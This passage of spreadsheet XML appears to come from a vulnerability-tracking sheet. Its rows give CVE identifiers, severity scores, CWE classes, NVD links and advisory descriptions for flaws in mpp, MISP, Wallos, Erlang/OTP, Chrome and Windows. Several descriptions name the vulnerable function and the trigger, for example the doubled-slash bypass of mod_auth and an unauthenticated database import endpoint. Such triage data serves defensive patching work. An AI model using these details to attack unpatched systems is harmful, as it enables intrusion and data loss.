          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82750</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for EIP-7702 account delegations of the client's choosing.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but never reads its aa_authorization_list field. Every signed delegation in that list is charged as intrinsic gas before the payment call runs, so a client attaching delegations from throwaway authority keys makes the sponsor pay for them within the default gas_limit ceiling. At the reporter's default of seven entries the sponsored cost rises from about 46,575 gas to about 1,884,087 gas. Because each entry is applied as a persistent set-code delegation, a client can also upgrade its own accounts to delegated code at the sponsor's expense.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82750</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82751</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for provisioning an access key on the client's own account.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but does not check whether the envelope carries the optional key_authorization field. A client can attach a fully signed key authorization, provisioning a new access key with token spending limits on its own account, alongside the normal payment call. The key and each limit entry are persistent storage writes billed as intrinsic gas to the sponsor, bounded only by the gas_limit ceiling. At the reporter's default of one key with three token limits the sponsored cost rises from about 46,587 gas to about 1,808,700 gas, and the client keeps a valid access key it paid nothing for.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82751</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85048</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>Use after free in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85048</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85538</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>An incorrect authorization vulnerability in MISP allowed authenticated users to delete attributes from events despite lacking the required perm_modify or perm_modify_org permissions.
The affected attribute deletion paths relied on organization membership checks performed by MispAttribute::deleteAttribute() but did not consistently enforce MISP's event modification authorization rules. Consequently, a user belonging to the organization associated with an event could potentially delete individual attributes or perform bulk attribute deletion even when their assigned role was not authorized to modify the event.
This created an inconsistency between attribute editing and deletion: editing an attribute correctly used MISP's ACL::canModifyEvent() authorization logic, whereas the affected deletion operations could bypass these permission checks.
An authenticated attacker with access to an affected MISP instance and membership in the organization owning an event could exploit this flaw to remove attributes from that event, potentially causing unauthorized modification or loss of threat intelligence data.
The patch introduces a common authorization check for all affected deletion paths. Before deletion, MISP now resolves the associated events and verifies that the current user is authorized to modify each event using the same authorization mechanism used by normal event and attribute modification operations.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85538</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52767</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R603"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S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54600</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/import.php has no authentication. The only guard is a user-table row count — if zero (fresh/unconfigured install), an unauthenticated attacker can replace the entire database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54600</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55951</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>The Erlang/OTP httpc HTTP client does not enforce a limit on the total size of response headers received from a server. The max_header_size option defaults to nolimit, and httpc_response:parse_headers/6 accumulates every header into a list before the length check runs (which only fires after the terminating CRLF CRLF is received).
A malicious or compromised HTTP server can send an arbitrarily large number of headers, or headers with very large values, causing the client process to allocate unbounded memory until the system runs out of memory or the BEAM VM crashes. A proof-of-concept server sending 100,000 headers of roughly 4000 bytes each caused the client VM to allocate over 13 GB of memory in under 30 seconds.
Any application using httpc:request/4,5 to connect to untrusted servers is affected. No authentication is required: any server the client connects to (including via a redirect or man-in-the-middle) can trigger the exhaustion.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605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55951</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61638</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/notifications/testemailnotifications.php accepts smtpaddress and smtpport from POST body with zero SSRF validation. PHPMailer connects to attacker-supplied host:port. Every other notification endpoint uses ssrf_helper.php but email was missed. Any authenticated user can probe internal network, cloud metadata. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61638</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62385</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M607" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr"/>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73, CWE-706</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66835</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-50</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>Path Equivalence vulnerability in Erlang/OTP inets httpd allows a remote unauthenticated attacker to read files inside a mod_auth protected directory by prefixing the request path with an extra slash.
httpd_request:validate_uri/1 normalises the request URI with uri_string:normalize/1, which performs RFC 3986 dot-segment removal but does not collapse empty path segments, so a doubled slash survives. mod_alias:real_name/3 concatenates the document root with that URI, and mod_auth:secret_path/3 then decides whether the result lies inside a protected directory block by running the configured directory path as an unanchored regular expression against it. The doubled slash breaks the contiguous substring the regex needs, so the request is treated as unprotected and no authentication challenge is issued, while mod_get opens the same path and the operating system collapses the doubled slash and returns the protected file. The same path mismatch also evades the per-path accounting in mod_security.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608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66835</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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09" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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10" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
